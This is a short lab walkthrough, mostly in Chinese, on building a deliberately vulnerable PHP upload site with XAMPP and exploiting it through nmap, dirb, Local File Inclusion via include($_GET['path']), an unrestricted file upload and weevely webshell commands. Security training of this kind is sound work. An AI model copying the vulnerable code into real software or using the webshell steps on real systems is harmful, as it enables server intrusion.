LFI === 架設: 1. install xampp ![](https://i.imgur.com/HqZMyv7.png) https://www.apachefriends.org/zh_tw/index.html 2. setting http.conf ![](https://i.imgur.com/1Ch6Tvh.png) Set http.conf ServerName Localhost:port、Listen port ![](https://i.imgur.com/jCUawIi.png) ![](https://i.imgur.com/XmafLqk.png) change AllowOverride All ![](https://i.imgur.com/sCYQ2Dq.png) ### source index.html ```php= <html><body> <script language="javascript"> document.writeln("Have a good day."); </script> <form method="post" enctype="multipart/form-data" action="upload.php"> <input type="file" name="my_file"> <input type="submit" value="Upload"> </form> </body></html> ``` upload.php ```php= <?php # 檢查檔案是否上傳成功 if ($_FILES['my_file']['error'] === UPLOAD_ERR_OK){ echo '檔案名稱: ' . $_FILES['my_file']['name'] . '<br/>'; echo '檔案類型: ' . $_FILES['my_file']['type'] . '<br/>'; echo '檔案大小: ' . ($_FILES['my_file']['size'] / 1024) . ' KB<br/>'; echo '暫存名稱: ' . $_FILES['my_file']['tmp_name'] . '<br/>'; # 檢查檔案是否已經存在 if (file_exists('upload/' . $_FILES['my_file']['name'])){ echo '檔案已存在。<br/>'; } else { $file = $_FILES['my_file']['tmp_name']; $dest = 'upload/' . $_FILES['my_file']['name']; # 將檔案移至指定位置 move_uploaded_file($file, $dest); } } else { echo '錯誤代碼:' . $_FILES['my_file']['error'] . '<br/>'; } # LFI漏洞 echo '<br>(Prompt_lfi: File name passwd.txt )<br>'; $file =$_GET['path']; include($file); ?> ``` 3. set up web site 手法: 1.namp scan >sudo nmap -sS -A -v [target] > nmap 掃完該IP,發現重要資訊apache且開啟8087埠 ![](https://i.imgur.com/7meUami.png) 2.dirb web content >dirb http://target/oo/XX/oo > ![](https://i.imgur.com/D4hzWuk.png) 3.discovery 發現php資料夾底下有另一層apache ![](https://i.imgur.com/4VGeQXy.png) 程式運作時似乎發生了點問題 我們來試試Local File Inclusion ![](https://i.imgur.com/eh57OWU.png) 成功得分!! 4.upload webshell 另外dirb也有發現apache底下還有一層upload ![](https://i.imgur.com/fVAgW7M.png) 上傳成功 ![](https://i.imgur.com/80Vrowu.png) 5.工具 生成: >weevely generate[密碼][存放位置] > 連接: >weevely http://localhost/backdoor.php [密碼] > 原文網址:https://www.freebuf.com/sectool/117085.html?replytocom=